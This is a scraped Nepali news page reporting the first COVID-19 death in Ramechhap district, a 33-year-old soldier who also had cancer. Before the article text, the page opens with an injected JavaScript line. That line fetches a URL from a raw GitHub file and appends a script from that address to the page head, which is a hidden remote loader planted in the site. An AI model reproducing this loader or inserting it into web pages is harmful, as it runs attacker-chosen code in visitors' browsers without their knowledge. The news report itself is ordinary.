;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा पहिलो पटक कोरोना संक्रमणबाट ३३ वर्षीय युवकको मृत्य – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा पहिलो पटक कोरोना संक्रमणबाट ३३ वर्षीय युवकको मृत्य
रामेछाप बिशेष

रामेछापमा पहिलो पटक कोरोना संक्रमणबाट ३३ वर्षीय युवकको मृत्य

भदौ ३०,

रामेछाप । रामेछाप जिल्लामा पहिलो पटक कोरोना संक्रमितको मृत्यु भएको छ । जिल्लाको लिखुतामाकोशी गाउँपालिका वडा नम्बर १ का ३३ वर्षका पुरुषको सोमबार मृत्यु भएको जिल्ला अस्पताल रामेछापका स्वास्थ्य अधिकृत भुवन थापाले जुनेली न्युजलाई जानकारी दिए ।

उनका अनुसार सोमबार स्वास्थ्य मन्त्रालयकले दिएका जानकारी एक जना रामेछापका युवाकको मृत्यु भएको र मृतकको पहिचान गर्ने क्रममा लिखुतामाकोशी गाउँपालिकाका युवक भएको पुष्टि भएको उनले बताए ।

उनलाई गत भदौ २३ गते कोरोना संक्रमण पुष्टि भएको थियो । नेपाली सेनामा कार्यरत रहेका यवक  क्यान्सर रोगबाट पीडित रहेका थिए । उनको छाउनी अस्पतालमा ज्यान गएको थापाले बताए । उनको शव हालसम्ममा छाउनी अस्पतालमा राखिएको छ ।  फाइल फोटो

फेसबुक प्रतिक्रियाहरु